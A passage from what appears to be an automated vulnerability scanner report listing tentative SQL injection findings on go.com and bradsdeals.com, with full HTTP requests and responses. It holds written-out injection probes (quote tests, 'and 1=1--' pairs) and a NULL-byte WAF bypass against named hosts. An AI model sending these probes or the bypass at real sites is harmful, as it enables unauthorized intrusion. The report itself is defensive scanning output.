
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
xserver: www661
Content-Length: 0
Content-Type: text/html


1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html


1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 392
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html


1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">D43C-B4C8-D45E-AE50</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d2--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Content-Length: 23948

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:22 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">9559-4CA2-4454-70E1</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d2--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=30665613173906%20or%201%3D2%2D%2D%20;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:23 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->

...[SNIP]...

1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

